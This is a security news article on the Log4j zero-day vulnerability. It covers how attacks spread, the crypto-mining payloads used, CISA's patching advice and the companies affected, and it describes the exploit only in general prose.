Log4j zero-day exploit might be the one that haunts internet for years

Hundreds of millions of devices affected by the Log4j flaw

Major zero-day- makes headlinesLog4j exploit results in one of the biggest cyber threats this year

Log4j is an open-source Java logging framework, part of the Apache Logging Services.[1] It is used at the enterprise level in different applications globally. Big news broke recently: the sensitive information about threatening flaws in the Apache Log4j logging library was shared, and soon enough, exploits started happening. Now, days later, things are still escalating. Experts point out that in just one day, more than 60 bigger mutations have spun off.

As Apache Log4j logging library exploits mutate fastly, the majority of the threats are related to cryptocurrency mining done on victims’ dimes.[2] That, however, is not the end of the problem but just the beginning. Threat actors are currently seeking to spread even more dangerous malware on vulnerable systems as well. Yet, it seems that major exploitations have been happening for a whole month and only now become public.

Right now, Cybersecurity and Infrastructure Security Agency (CISA) is working closely with partners in order to fix the issue. It is hoped that soon the vulnerability could be patched. Now the problem remains the same: crime actors exects unauthenticated, remote code and change the user-agent in the browser to a different string. The string will force a callback to the attacker's URL when the Log4j library parses it, and it could be used to encode commands to unprotected devices.

Companies rush to protect their own products

These exploits spread incredibly rapidly and could leave systems with major cybersecurity problems. That is why CISA strongly advises anyone that was impacted by these exploits to immediately apply available patches. According to CISA, patching should start with critical systems, then move to internet-facing systems and networked servers. Other possibly affected technologies should be patched as well.

However, it seems that patches are rolling out too slow and cannot guarantee full protection. With these massive exploits impacting a number of online services, like Twitter, Amazon, or Minecraft, hackers are as invested as ever. Global cybersecurity watchdogs CERT reports that the zero-day is being exploited, and hackers are actively seeking to find the not upgraded to Apache log4j version 2.15.0.[3]

Soon after the news about the exploits broke out, many companies started to look into their own products and whether they are impacted. According to the media, major global companies like Apple, Amazon, Twitter, Cloudflare, Baidu, NetEase, and Tencent are still facing the aftermath of the zero-day vulnerability. For example, with Minecraft's exploitations still somewhat active, some users have been able to control other users' systems.

Cybersecurity should not be forgotten as the issue might be serious in the future

These major cyber threats come as a reminder to stay alert. With the cyber environment becoming more dangerous, companies and users rely on fix-up patches. A security patch usually is an update that is often pushed from a software developer to all the devices that have the software that needs to update. Often, they are pushed out after a major security breach or vulnerability. Their purpose is to cover the security holes that a major software update or initial software download did not.[4]

With the exploits like in the Log4j case, the best response should be quick and correct. A zero-day vulnerability has a huge potential to impact millions of customers and companies globally.[5] As it is usually an unknown exploit, it can create complicated problems before anyone realizes something is wrong or what the next step should be. In recent years, zero-day vulnerabilities have become more common.

In 2021 Google's Chrome suffered serious threats that caused Chrome to be updated. Back in 2020, Zoom suffered as well as hackers managed to access computers and other devices remotely due to the vulnerabilities in the older versions of Windows. In a similar manner, Apple was hit as a zero-day bug that allowed attackers to compromise iPhones remotely.

About the author
Ugnius Kiguolis
Ugnius Kiguolis - The mastermind

Ugnius Kiguolis is a professional malware analyst who is also the founder and the owner of 2-Spyware. At the moment, he takes over as Editor-in-chief.

Contact Ugnius Kiguolis
About the company Esolutions

Read in other languages